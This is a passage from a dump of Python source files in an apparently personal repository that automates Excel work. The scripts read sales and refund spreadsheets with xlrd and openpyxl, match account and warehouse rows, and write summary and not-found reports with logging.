_locationList[0].strip()\n\n # add to the dict\n accountDict[_account + '_' + _location] = _row\n\n # process the refund\n for _refundIndex in range(0, _refundInstance.length):\n _refundAccount, _refundLocation, _refund = _refundInstance.get(_refundIndex)\n\n if _refundAccount + '_' + _refundLocation in accountDict:\n self.__correctCount += 1\n _refundTable[\"I\" + str(accountDict[_refundAccount + '_' + _refundLocation])].value = _refund\n else:\n self.__processRefundNotFound(_infoType, _refundInstance.platform, _refundAccount, _refundLocation, _refund)\n except Exception:\n processException()\n\n return\n\n\n def __processRefundNotFound(self, _infoType, _platform, _refundAccount, _refundLocation, _refund):\n\n try:\n # find the account and location in the notfound table\n for _row in range(2, self.notfoundTable.max_row + 1):\n _nfType = self.notfoundTable[\"A\" + str(_row)].value\n _nfPlatform = self.notfoundTable[\"B\" + str(_row)].value\n _nfAccount = self.notfoundTable[\"C\" + str(_row)].value\n _nfLocation = self.notfoundTable[\"E\" + str(_row)].value.split(' ')[1]\n\n if _infoType == _nfType and _platform == _nfPlatform and _refundAccount == _nfAccount and _refundLocation == _nfLocation:\n self.notfoundTable[\"H\" + str(_row)] = _refund\n return\n\n except Exception:\n processException()\n return\n\n\n # if do not be found, we insert and send warning\n _row = self.notfoundTable.max_row + 1\n self.notfoundTable[\"A\" + str(_row)].value = _infoType\n self.notfoundTable[\"B\" + str(_row)].value = _platform\n self.notfoundTable[\"C\" + str(_row)].value = _refundAccount\n self.notfoundTable[\"E\" + str(_row)].value = \"unkown \" + _refundLocation\n self.notfoundTable[\"I\" + str(_row)].value = _refund\n\n # count the failcount and send the error\n self.__failCount += 1\n ErrorList.addError(NotFound(\"REFUND ERROR!\\tType = \" + _infoType + \"\\tPlatform: \" + _platform, \"Can not match the refund account and location!!\"))\n\n\n def getFailCount(self):\n return self.__failCount\n\n def getCorrectCount(self):\n return self.__correctCount"
},
{
"alpha_fraction": 0.5633175373077393,
"alphanum_fraction": 0.5802950263023376,
"avg_line_length": 26.35877799987793,
"blob_id": "83ad6ef4b71050d044a9ebf7433751f57b485185",
"content_id": "987e6a4122f24431629032194903c6bc9507190c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3607,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 131,
"path": "/oldVesion/doit.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import xlrd\nimport xlwt\n\n# define data class\nclass info:\n account = \"undefined\"\n name = \"undefined\"\n location = \"undefined\"\n salesAmount = 0.0\n profitRate = 0.0\n normal = 1 # to mark the cell is nornal or not\n\n\n\ndef getInfo(filePath):\n # open the file\n data = xlrd.open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(0,1)\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n if _infoType == \"C类\" : _infoType += (\"打底裤\")\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n _row = 0\n nrow = table.max_row\n\n # for each module to find out useful info\n while _row < nrow:\n # add 1 to _row to ignore the title\n _row += 1\n\n # create the module info instance\n _infoInstance = info()\n\n _infoInstance.name = table.cell(_row,1).value.split('/',2)[0]\n if _infoInstance.name == \"\":\n _infoInstance.name = '/'\n\n # to process the account/location cell\n row_3 = table.cell(_row,2).value\n _infoInstance.account = row_3.split('/')[0]\n # remove the charactor \"仓\"\n _infoInstance.location = row_3.split('/')[1][0:-1] \n\n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == None:\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 3\n\n data.release_resources()\n return _platform, _infoType, _infoList\n\n\n\n\n\n\n\n# open the file\nxlrd.Book.encoding = \"utf8\"\ndata = xlrd.open_workbook(\"A.xlsx\")\n\n# for each file to process data \n\n\n# to store this file data which platform and type is\nplatform = \"wish\"\ninfoType = \"A类\"\n\n# use info list to temporary store data \ninfoList = []\n\n# for each table to process data\nsheets = data.sheets()\nfor table in sheets:\n row = 0\n nrow = table.nrows\n\n # for each module to find out useful info\n while row < nrow:\n # add 1 to row to ignore the title\n row += 1\n\n # create the module info instance\n infoInstance = info()\n\n infoInstance.name = table.cell_value(row,1).split('/',2)[0]\n\n # to process the account/location cell\n row_2 = table.cell_value(row,2)\n infoInstance.account = row_2.split('/')[0]\n # remove the charactor \"仓\"\n infoInstance.location = row_2.split('/')[1][0:-1] \n\n # to judge this module is normal or not\n row_3 = table.cell_value(row,3)\n if row_3 == '':\n infoInstance.normal = 0\n infoInstance.salesAmount = table.cell_value(row,4)\n else :\n infoInstance.salesAmount = table.cell_value(row,3)\n infoInstance.profitRate = table.cell_value(row+1,4)\n\n # append the module instance into the list\n infoList.append(infoInstance)\n\n # add 3 to variable row to move to next module \n row += 3\n\n\n# open report to write down\n# summary = xlwt.w\n\n# for each data in infoList to write down in the report\n# for infoInstance in infoList:\n \n"
},
{
"alpha_fraction": 0.6982905864715576,
"alphanum_fraction": 0.7059829235076904,
"avg_line_length": 23.914894104003906,
"blob_id": "0c3dd5d7f4b1f4efa2df253b428577279d206ca1",
"content_id": "887d6ceed12e9ceb1001ac6ea2ca9c321dd29bd2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1170,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 47,
"path": "/oldVesion/test.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "import xlrd\nimport xlwt\nimport openpyxl\nfrom openpyxl import Workbook, load_workbook\nfrom openpyxl.styles import colors\nfrom openpyxl.styles import Font, Color\n\n# open the file\n# xlrd.Book.encoding = \"utf8\"\n# data = xlrd.open_workbook(\"A.xlsx\")\n# summary = xlrd.open_workbook(\"B.xls\",formatting_info=True)\n\n# table = summary.sheet_by_index(0)\n\n# print(table.merged_cells)\n\nstr = \"Hel lo\"\nprint(str.split(\" \",1))\n\n# open report to write down\n# summary = xlrd.open_workbook(\"../data/refund.xls\",formatting_info=True)\n# newbook = Workbook()\n\n# find the infotype table\n# reportTable = summary.sheet_by_index(0)\n# print(reportTable.name)\n\n# for merge in reportTable.merged_cells:\n# rs, re, cs, ce = merge\n# print(1)\n# print(merge)\n\n# newsheet = newbook.create_sheet(\"test\")\n# newsheet = summary.copy_worksheet(reportTable)\n\n# # find the index of platform\n# mergeList = reportTable.merged_cells\n\n# print(mergeList)\n# fontStyle = Font(name=\"Calibri\", size=12, color=colors.BLACK)\n# reportTable['G3'].value = \"safdasfa\"\n# reportTable['G3'].font = fontStyle\n# summary.save(\"output.xlsx\")\n\n# newbook.save(\"output.xlsx\")\n# summary.close()\n# newbook.close()"
},
{
"alpha_fraction": 0.5388237237930298,
"alphanum_fraction": 0.5449709892272949,
"avg_line_length": 32.703975677490234,
"blob_id": "071f4eaca4eee3807c4eef71fc795e6159afdd9b",
"content_id": "d5c18e2634f72c5def0ddc7fda2a4004b2f8e16f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 23799,
"license_type": "no_license",
"max_line_length": 172,
"num_lines": 679,
"path": "/oldVesion/dev.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from os import path as osPath\nfrom os import listdir,system\nimport sys\nimport linecache\nfrom datetime import datetime\nfrom xlrd import open_workbook\nfrom time import sleep\nfrom threading import Thread\nfrom openpyxl import load_workbook,Workbook\n\n# define data class\nclass info:\n def __init__(self):\n self.account = \"undefined\"\n self.name = \"undefined\"\n self.location = \"undefined\"\n self.salesAmount = 0.0\n self.profitRate = 0.0\n self.normal = True # to mark the cell is nornal or not \n\n\nclass refundInfo:\n def __init__(self, _platform):\n self.accountList = []\n self.locationList = []\n self.refundList = []\n self.length = 0\n self.platform = _platform\n\n def add(self, _account, _location, _refund):\n self.accountList.append(_account)\n self.locationList.append(_location)\n self.refundList.append(_refund)\n self.length += 1\n\n def get(self, index):\n return self.accountList[index], self.locationList[index], self.refundList[index]\n\n\nclass error:\n TYPE_ERROR = 1\n TYPE_WARNING = 2\n TYPE_NOTFOUND = 3\n\n def __init__(self,_path,_message, _type = TYPE_ERROR):\n self.errorType = _type\n self.path = _path\n self.message = _message\n\n def printError(self, _type):\n if _type == error.TYPE_ERROR:\n print(\"ERROR: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n \n elif _type == error.TYPE_WARNING:\n print(\"Warning: \" + self.message)\n print(\"PATH: \" + self.path + \"\\n\")\n\n elif _type == error.TYPE_NOTFOUND:\n print(\"PATH: \" + self.path)\n\n\ndef is_contains_chinese(strs):\n for _char in strs:\n if '\\u4e00' <= _char <= '\\u9fa5':\n return True\n return False\n\ndef processException():\n exc_type, exc_obj, tb = sys.exc_info()\n f = tb.tb_frame\n lineno = tb.tb_lineno\n filename = f.f_code.co_filename\n linecache.checkcache(filename)\n line = linecache.getline(filename, lineno, f.f_globals)\n\n # send error\n errorList.append(error(filename,'APPLICATION EXCEPTION (LINE {} \"{}\"): {}'.format(lineno, line.strip(), exc_obj)))\n print('APPLICATION EXCEPTION (LINE {} \"{}\"): {}'.format(lineno, line.strip(), exc_obj))\n\n # stop the system and exit\n system(\"pause\")\n exit()\n \n\n\ndef getReportPath(path, _files, _tips, _onlyXlsx = True):\n _count = 0\n _pathList = []\n\n _isXls = False\n\n # print file list\n for _file in _files:\n # 去除文件夹,非.xlsx文件以及临时文件\n if (not osPath.isdir(path + '/' + _file)) and \"~$\" not in _file:\n if \".xlsx\" in _file or (not _onlyXlsx and \".xls\" in _file):\n _count += 1\n _pathList.append(path + '/' + _file)\n print(str(_count) + \"、\" + _file)\n\n \n # only at the onlyxlsx mode, will send the warning\n if _onlyXlsx and \".xls\" in _file and \".xlsx\" not in _file :\n _isXls = True\n\n # do not find file\n if _count == 0:\n errorList.append(error(\"./\", \"do not find files\", error.TYPE_ERROR))\n print(\"do not find files\")\n return None\n\n # warning find .xls file\n if _isXls:\n errorList.append(error(\"./\", \"We have found .xls file in report list\", error.TYPE_WARNING))\n print(\"We have found .xls file, but the software can not read the .xls as report table!\")\n print(\"Please convert it into .xlsx file, if you want to read it!!!\")\n\n # input file number\n _index = 0\n while _index <= 0 or _index > _count:\n _input = input(\"input number to choose \"+ _tips +\" file:\")\n if _input == \"\" or not _input.isdigit():\n continue\n \n _index = int(_input)\n if _index <= 0 or _index > _count:\n print(\"wrong number\\n\")\n \n # output \\n\n print(\"\\n\")\n \n return _pathList[_index - 1]\n\n\ndef findPlatformIndex(_reportTable, _platform):\n try:\n # store the merge cell's info\n mergeList = _reportTable.merged_cells\n mergeDict = {}\n for mergeCell in mergeList:\n mergeDict[mergeCell.min_row] = mergeCell.max_row - mergeCell.min_row\n\n # to find the index of platform\n isFindPlatform = False\n index = 1\n while index < _reportTable.max_row:\n _reportPlatform = _reportTable[\"C\" + str(index)].value\n if _reportPlatform is None:\n index += 1\n continue\n _reportPlatform = _reportPlatform if not _reportPlatform.strip().isalpha() else _reportPlatform.lower()\n if _reportPlatform.strip() == _platform.strip().lower():\n isFindPlatform = True\n break\n else :\n if mergeDict.get(index) != None:\n index += mergeDict.get(index) + 1\n else :\n index +=1\n\n offset = mergeDict[index] + 1 if index in mergeDict else 1\n \n except Exception:\n processException()\n return -1, 0\n\n else:\n if isFindPlatform:\n return index, offset\n else:\n return -1, 0\n\n\ndef processRefundNotFound(_infoType, _platform, _refundAccount, _refundLocation, _refund):\n\n try:\n # find the account and location in the notfound table\n for _row in range(2, notfoundTable.max_row + 1):\n _nfType = notfoundTable[\"A\" + str(_row)].value\n _nfPlatform = notfoundTable[\"B\" + str(_row)].value\n _nfAccount = notfoundTable[\"C\" + str(_row)].value\n _nfLocation = notfoundTable[\"E\" + str(_row)].value.split(' ')[1]\n\n if _infoType == _nfType and _platform == _nfPlatform and _refundAccount == _nfAccount and _refundLocation == _nfLocation:\n notfoundTable[\"H\" + str(_row)] = _refund\n return\n\n except Exception:\n processException()\n return\n\n\n # if do not be found, we insert and send warning\n _row = notfoundTable.max_row + 1\n notfoundTable[\"A\" + str(_row)].value = _infoType\n notfoundTable[\"B\" + str(_row)].value = _platform\n notfoundTable[\"C\" + str(_row)].value = _refundAccount\n notfoundTable[\"E\" + str(_row)].value = \"unkown \" + _refundLocation\n notfoundTable[\"I\" + str(_row)].value = _refund\n\n # count the failcount and send the error\n global failCount\n failCount += 1\n errorList.append(error(\"REFUND ERROR!\\tType = \" + _infoType + \"\\tPlatform: \" + _platform, \"Can not match the refund account and location!!\", error.TYPE_NOTFOUND))\n\n\ndef getRefundInfo(_refundTable):\n try:\n _refundInfoList = []\n\n # use the merge cell to locate the useful cell\n for merge in _refundTable.merged_cells:\n rs, re, cs, ce = merge\n\n # ignore some merge cell\n if re-rs != 1 and ce-cs != 2:\n continue\n\n # ignore when it has no info\n if _refundTable.cell_value(re,cs) == \"\":\n continue\n \n # read the platform\n _platform = _refundTable.cell_value(rs,cs).strip().lower()\n if is_contains_chinese(_platform):\n errorList.append(error(\"REFUND ERROR! Type = \" + _refundTable.name + \"\\tPlatform: \" + _platform, \"We can not identify the chinese as platform name\"))\n continue\n else:\n _refundInfoInstance = refundInfo(_platform)\n\n _row = re + 1 if _refundTable.cell_value(re,cs) == \"账号\" else re\n while True:\n _acclo = _refundTable.cell_value(_row,cs)\n\n if _acclo == \"\":\n break\n else:\n # split the account and location\n if '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n elif '(' in _acclo:\n _accloList = _acclo.split(\"(\",1)\n _account = _accloList[0].strip()\n _location = _accloList[1].split(')',1)[0].strip()\n else:\n _acclo = _acclo.strip()\n _accloList = _acclo.split(\" \",1)\n _account = _accloList[0].strip()\n\n # set the default value\n if len(_accloList) == 1:\n _location = \"CN\"\n else:\n _location = _accloList[1].strip()\n \n # read the refund\n _refund = _refundTable.cell_value(_row,cs+1)\n \n _refundInfoInstance.add(_account, _location, _refund)\n \n # add 1 to row\n _row += 1\n \n # add to the list\n _refundInfoList.append(_refundInfoInstance)\n except Exception:\n processException()\n\n return _refundInfoList\n\ndef setRefundInfo(_infoType, _refundInfoList):\n try:\n # if can not find correct type, return\n if _infoType not in summary.sheetnames:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct sheet: \" + _infoType))\n return \n _refundTable = summary[_infoType]\n\n for _refundInstance in _refundInfoList:\n _index, _offset = findPlatformIndex(_refundTable, _refundInstance.platform)\n \n # if can not find platform, send error\n if _index == -1:\n errorList.append(error(\"REFUND ERROR\",\"can not find correct platform: \" + _refundInstance.platform))\n continue\n \n # create the dictionary \n accountDict = {}\n for _row in range(_index, _index + _offset):\n _account = _refundTable[\"D\" + str(_row)].value.strip()\n _locationList = _refundTable[\"F\" + str(_row)].value.split(' ')\n _location = _locationList[1].strip() if len(_locationList) > 1 else _locationList[0].strip()\n\n # add to the dict\n accountDict[_account + '_' + _location] = _row\n\n # process the refund\n for _refundIndex in range(0, _refundInstance.length):\n _refundAccount, _refundLocation, _refund = _refundInstance.get(_refundIndex)\n\n if _refundAccount + '_' + _refundLocation in accountDict:\n global correctCount\n correctCount += 1\n _refundTable[\"I\" + str(accountDict[_refundAccount + '_' + _refundLocation])].value = _refund\n else:\n processRefundNotFound(_infoType, _refundInstance.platform, _refundAccount, _refundLocation, _refund)\n except Exception:\n processException()\n\n return\n\ndef processRefundInfo(_filePath):\n\n try:\n _refundBook = open_workbook(_filePath,formatting_info=True)\n _refundSheets = _refundBook.sheets()\n\n except Exception:\n processException()\n\n for _refundsheet in _refundSheets:\n _infoType = _refundsheet.name\n\n print(\"正在处理 \" + _infoType + \" 退款金额...\")\n\n _refundInfoList = getRefundInfo(_refundsheet)\n setRefundInfo(_infoType, _refundInfoList)\n \n\ndef getInfoByXlrd(filePath):\n try:\n # open the file\n data = open_workbook(filePath)\n\n # to store this file data which _platform and type is\n _platform = data.sheet_by_index(0).cell_value(1,0).split('/')[0]\n _infoType = data.sheet_by_index(0).cell_value(1,1).split('/',2)[1]\n\n # use info list to temporary store data \n _infoList = []\n\n # for each table to process data\n sheets = data.sheets()\n for table in sheets:\n # ignore the sheet of \"原始\"\n if table.name == \"原始\":\n continue\n\n _row = 1\n nrow = table.nrows\n\n # for each module to find out useful info\n while _row < nrow:\n # if find the none row, add 1 to row for finding the next\n if table.cell(_row,1).value == \"\":\n _row += 1\n continue\n\n # if account is none, the wo think the line is bad\n row_3List = table.cell(_row,2).value.split('/')\n if row_3List[0] == \"\" or is_contains_chinese(row_3List[0]):\n _row += 1\n continue\n\n # create the module info instance\n _infoInstance = info()\n\n # to process the account/location cell\n _infoInstance.account = row_3List[0]\n _infoInstance.location = row_3List[1] if not is_contains_chinese(row_3List[1]) else row_3List[1][0:-1]\n\n # if cell has no name, then wo think this line is bad \n _nameInTable = table.cell(_row,1).value.split('/',2)\n _infoInstance.name = \"/\" if _nameInTable[0] == \"\" else _nameInTable[0]\n if _infoType == \"类\": _infoType = _nameInTable[1]\n \n # to judge this module is normal or not\n row_4 = table.cell(_row,3).value\n if row_4 == \"\":\n _infoInstance.normal = False\n _infoInstance.salesAmount = table.cell(_row,4).value\n else :\n _infoInstance.salesAmount = row_4\n _infoInstance.profitRate = table.cell(_row+1,4).value\n\n # append the module instance into the list\n _infoList.append(_infoInstance)\n\n # add 3 to variable _row to move to next module \n _row += 2\n\n data.release_resources()\n\n except Exception:\n processException()\n return \"\", \"\", []\n else :\n return _platform, _infoType, _infoList\n\n\ndef processNotFoundInfo(_platform, _infoType, _infoInstance):\n _row = notfoundTable.max_row + 1\n notfoundTable[\"A\" + str(_row)] = _infoType\n notfoundTable[\"B\" + str(_row)] = _platform\n notfoundTable[\"C\" + str(_row)] = _infoInstance.account\n notfoundTable[\"D\" + str(_row)] = _infoInstance.name\n notfoundTable[\"E\" + str(_row)] = _infoInstance.name + \" \" + _infoInstance.location\n # to judge the normal is true or not\n if _infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n notfoundTable[\"F\" + str(_row)].value = _infoInstance.salesAmount\n notfoundTable[\"G\" + str(_row)].value = _infoInstance.profitRate\n else :\n # else write down the margin \n notfoundTable[\"I\" + str(_row)].value = _infoInstance.salesAmount\n\n\ndef setInfo(_platform, _infoType, _infoList, _path):\n try:\n # find the infotype table\n if _infoType not in summary.sheetnames:\n errorList.append(error(_path,\"can not find correct sheet: \" + _infoType))\n return \n reportTable = summary[_infoType]\n\n # to find the index of platform\n index, offset = findPlatformIndex(reportTable, _platform)\n if index == -1:\n errorList.append(error(_path, \"can not find correct platform: \" + _platform))\n return\n\n # for each data in infoList to write down in the report\n for infoInstance in _infoList:\n isFind = False # to mark the account is finded or not\n\n for row in range(index, index + offset):\n reportAccount = reportTable[\"D\" + str(row)].value\n reportLocationList = reportTable[\"F\" + str(row)].value.split(' ')\n reportLocation = reportLocationList[1] if len(reportLocationList) > 1 else reportLocationList[0]\n\n # to match corret account and location row\n if infoInstance.account == reportAccount and infoInstance.location == reportLocation :\n isFind = True\n global correctCount\n correctCount += 1\n\n # if the name is wrong, then change the name \n reportName = reportTable[\"E\" + str(row)].value\n if infoInstance.name != reportName : \n reportTable[\"E\" + str(row)].value = infoInstance.name\n reportTable[\"F\" + str(row)].value = infoInstance.name + \" \" + infoInstance.location\n\n # to judge the normal is true or not\n if infoInstance.normal :\n # if normal, then write down the salesAmount and profitRate\n reportTable[\"G\" + str(row)].value = infoInstance.salesAmount\n reportTable[\"H\" + str(row)].value = infoInstance.profitRate\n else :\n # else write down the margin \n reportTable[\"J\" + str(row)].value = infoInstance.salesAmount\n\n # write down and break the for loop\n break\n\n if isFind:\n continue\n else:\n global failCount\n failCount += 1\n errorList.append(error(_path, \"存在新增数据,请自行插入,数据已录入 notfound.xlsx\", error.TYPE_NOTFOUND))\n processNotFoundInfo(_platform, _infoType, infoInstance)\n\n # 由于有合并表格的存在,插入一行真的极其的烦,功能后面在迭代吧,我不行了\n except Exception:\n processException()\n\n \ndef getInfoWithTime(_lastpath):\n print(\"正在处理文件:\" + _lastpath)\n _startTime = datetime.now()\n\n try:\n _platform, _infoType, _infoList = getInfoByXlrd(_lastpath)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"\\r文件已读取完成,用时 \" + str(_interval) + \" 秒\")\n\n except Exception:\n processException()\n return \"\", \"\", []\n \n else:\n return _platform, _infoType, _infoList\n\n\ndef setInfoWithTime(_platform, _infoType, _infoList, _path):\n print(\"正在写入数据...\\r\".format(),end=\"\")\n _startTime = datetime.now()\n\n # ignore writing when info list is none\n if _infoList == []:\n errorList.append(error(_path, \"读取数据为空,注意检查\", error.TYPE_WARNING))\n print(\"读取数据为空,已跳过写入!!\")\n return \n\n try:\n setInfo(_platform, _infoType, _infoList, _path)\n _endTime = datetime.now()\n _interval = (_endTime-_startTime).seconds\n print(\"数据已处理完成,用时 \" + str(_interval) + \" 秒\\n\")\n\n except Exception:\n processException()\n\n\ndef save(_fileName):\n print(\"\\n正在保存文件\")\n _fileName = \"output\" if _fileName == \"\" else _fileName\n\n try:\n summary.save(path + \"/\" + _fileName + \".xlsx\")\n notfound.save(path + \"/notfound.xlsx\")\n\n except Exception:\n processException()\n print(\"文件保存失败,请检查 \" + _fileName + \".xlsx 或 notfound.xlsx 是否在打开状态。请关闭文件后重试!!!\")\n\n else:\n print(\"保存文件成功,路径:\" + path + \"/\" + _fileName + \".xlsx\") \n\n\ndef get_user_input(user_input_ref):\n user_input_ref[0] = input(\"输入文件名(直接回车或 20 秒后将使用默认文件名保存):\")\n\n\ndef initNotFoundTable():\n notfoundTable[\"A1\"] = \"类型\"\n notfoundTable[\"B1\"] = \"渠道\"\n notfoundTable[\"C1\"] = \"账号\"\n notfoundTable[\"D1\"] = \"姓名\"\n notfoundTable[\"E1\"] = \"姓名/仓\"\n notfoundTable[\"F1\"] = \"销售额\"\n notfoundTable[\"G1\"] = \"利润率\"\n notfoundTable[\"H1\"] = \"退款金额\"\n notfoundTable[\"I1\"] = \"毛利\"\n\n\ndef processDir(_filepath):\n _files = listdir(_filepath) \n\n for _file in _files:\n _lastpath = _filepath + '/' + _file\n\n #判断是否是文件夹\n if osPath.isdir(_lastpath): \n # 递归搜索\n processDir(_lastpath)\n else:\n # to process each file\n \n # ignore the files which not .xlsx or .xls file\n if not (\".xls\" in _file):\n continue\n else:\n # ignore the temporary files\n if \"~$\" in _file:\n errorList.append(error(_lastpath, \"find \\'~$\\' in the file name, do use \\'~$\\' for file name in case we see it as temporary files\", error.TYPE_WARNING))\n continue\n\n platform, infoType, infoList = getInfoWithTime(_lastpath)\n setInfoWithTime(platform, infoType, infoList, _lastpath)\n\n\ndef openReport(_reportPath):\n print(\"正在读取汇总文件\\r\")\n try:\n _summary = load_workbook(_reportPath)\n except Exception:\n print(\"读取汇总文件发生错误,可能汇总文件已被打开,请关闭文件后重试!!\")\n processException()\n return None\n else: \n print(\"汇总文件读取成功:\" + _reportPath + \"\\n\")\n return _summary\n\n\n\ndef printMessage(_type):\n count = 0\n for errorM in errorList:\n if errorM.errorType == _type:\n count += 1\n errorM.printError(_type)\n\n return count\n\n\n\n# --------------------------------------------------------------------------------------------- #\n# main function #\n# --------------------------------------------------------------------------------------------- #\n\n\n#文件夹目录\npath = \"../data\"\n#得到文件夹下的所有文件名称\nfiles= listdir(path) \n\n# mark the message throught the process\nerrorList = []\ncorrectCount = 0\nfailCount = 0\n\n# open report to write down\nreportPath = getReportPath(path, files, \"summary\")\nrefundPath = getReportPath(path, files, \"refund\", _onlyXlsx = False)\n\n# start timer\nstartTime = datetime.now()\n\nif reportPath is not None:\n # open the report\n summary = openReport(reportPath)\n if summary is not None : \n\n # init notfound table\n notfound = Workbook()\n notfoundTable = notfound.active\n initNotFoundTable()\n\n #遍历文件夹\n for file in files: \n filePath = path + '/' + file\n #判断是否是文件夹\n if osPath.isdir(filePath): \n processDir(filePath)\n\n processRefundInfo(refundPath)\n\n # Declare a mutable object so that it can be pass via reference\n user_input = [None]\n\n mythread = Thread(target=get_user_input, args=(user_input,))\n mythread.daemon = True\n mythread.start()\n\n for increment in range(0, 21):\n sleep(1)\n if user_input[0] is not None:\n save(user_input[0])\n break\n # print (\"\\r输入文件名(直接回车或 \".format() + str(20 - increment) + \" 秒后将使用默认文件名保存):\", end=\"\")\n\n if user_input[0] is None:\n save(\"output\")\n\n # print the error list\n print(\"\\n操作过程有以下错误:\")\n errorCount = printMessage(error.TYPE_ERROR)\n\n print(\"\\n操作过程有以下警告:\")\n warningCount = printMessage(error.TYPE_WARNING)\n\n print(\"\\n存在新增数据,请自行插入,数据已录入 notfound.xlsx\")\n acount = printMessage(error.TYPE_NOTFOUND)\n warningCount += 1 if acount != 0 else 0\n\n endTime = datetime.now()\n interval = (endTime-startTime).seconds\n\n print(\"\\n已处理完成! 共耗时 \" + str(interval) + \" 秒\")\n print(\"成功命中数据 \" + str(correctCount) + \" 条,失败命中数据 \" + str(failCount) + \" 条。\")\n print(\"出现错误 \" + str(errorCount) + \" 项,警告 \" + str(warningCount) + \" 项。\")\n\n# pause the os in case disappear\nsystem(\"pause\")\n\n \n \n \n\n "
},
{
"alpha_fraction": 0.5505791306495667,
"alphanum_fraction": 0.5521235466003418,
"avg_line_length": 22.94444465637207,
"blob_id": "00449c4365c3bb7797eb180d3c87ec81fa580ebe",
"content_id": "1c757a0b9702ab82ff0a0b0a0d4d135932f5a497",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1323,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 54,
"path": "/src/log.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\n\nclass Log:\n def __init__(self, message, date = None):\n if date is None: \n self.date = datetime.now()\n else :\n self.date = date\n self.message = message\n\n def printLog(self):\n logstr = \"[ {} ]: {}\".format(self.date, self.message)\n print(logstr)\n\n def toString(self):\n logstr = \"[ {} ]: {}\".format(self.date, self.message)\n return logstr\n\n\nclass Logger:\n\n __logList = []\n\n LOG_TYPE_DO = 1\n LOG_TYPE_SAVE = 2\n\n\n @classmethod\n def addLog(logger, message:str):\n logger.__logList.append(Log(message))\n\n @classmethod\n def addDateLog(logger, message:str, date):\n logger.__logList.append(Log(message, date))\n\n @classmethod\n def addPrefabLog(logger, logType, path = \"\" ):\n if logType == logger.LOG_TYPE_DO:\n logger.addLog(\"正在处理文件: \" + path)\n \n elif logType == logger.LOG_TYPE_SAVE:\n logger.addLog(\"正在保存文件: \" + path)\n\n @classmethod\n def printLog(logger):\n for log in logger.__logList:\n log.printLog()\n\n @classmethod\n def writeLog(logger):\n file = open(\"./log.txt\",\"w\")\n for log in logger.__logList:\n file.write(log.toString() + '\\n')\n file.close()\n\n\n"
},
{
"alpha_fraction": 0.5803075432777405,
"alphanum_fraction": 0.5875694155693054,
"avg_line_length": 31.061643600463867,
"blob_id": "6edb104f24081ddd6166c315d905e8fd14d66e3b",
"content_id": "ced9b758e6698c2138a6771e3a807c14799bdf53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5128,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 146,
"path": "/src/xlsutils.py",
"repo_name": "Raymondhsm/PythonDoExcel",
"src_encoding": "UTF-8",
"text": "from openpyxl.styles import PatternFill\nfrom copy import copy\n\n\n\ndef setColor(cell, color):\n '''\n :param\\n\n cell 单元格\n color 输入颜色16进制RGB格式或预设颜色字符串\n red, yellow, white, purple, grey, skyBlue, lightGreen, blue, green, black\n '''\n\n _color_type = {\n \"red\" : \"FF0000\",\n \"yellow\" : \"EEEE00\",\n \"white\" : \"FFFFFF\",\n \"purple\" : \"8A2BE2\",\n \"grey\" : \"C4C4C4\",\n \"skyBlue\" : \"97FFFF\",\n \"lightGreen\" : \"7FFF00\",\n \"blue\" : \"1874CD\",\n \"green\" : \"00CD00\",\n \"black\" : \"0A0A0A\"\n }\n\n if color in _color_type:\n color = _color_type[color]\n\n try:\n fill = PatternFill(\"solid\", fgColor = color)\n cell.fill = fill\n except:\n print(\"wrong color\")\n\n\n\ndef copy_cell(source_cell, target_cell):\n target_cell.data_type = source_cell.data_type\n target_cell.value = source_cell.value\n if source_cell.has_style:\n target_cell._style = copy(source_cell._style)\n target_cell.font = copy(source_cell.font)\n target_cell.border = copy(source_cell.border)\n target_cell.fill = copy(source_cell.fill)\n target_cell.number_format = copy(source_cell.number_format)\n target_cell.protection = copy(source_cell.protection)\n target_cell.alignment = copy(source_cell.alignment)\n \n if source_cell.hyperlink:\n target_cell._hyperlink = copy(source_cell.hyperlink)\n \n if source_cell.comment:\n target_cell.comment = copy(source_cell.comment)\n \n \ndef insert_rows(table, row, attach_direction = None,amount = 1):\n '''\n :Description: 重新封装插入一行\n \\n:param: \n table 需要插入的表格sheet\n row 插入的行号\n amount 插入的行数\n attach_direction None为不合并,True为附着在上方的合并单元格,False为附着在下方的合并单元格\n \\n:return: none\n '''\n\n # 获取合并的单元格\n merges = table.merged_cells\n mergesCpy = merges.__copy__()\n\n # 拆分行号大于插入值的合并单元格,方便处理\n for merge in mergesCpy:\n if merge.max_row >= row:\n table.unmerge_cells(merge.coord)\n\n # 插入新的行\n table.insert_rows(row, amount)\n\n # 重新合并单元格\n for merge in mergesCpy:\n if attach_direction is None:\n min_row = merge.min_row + amount if merge.min_row >= row else merge.min_row\n max_row = 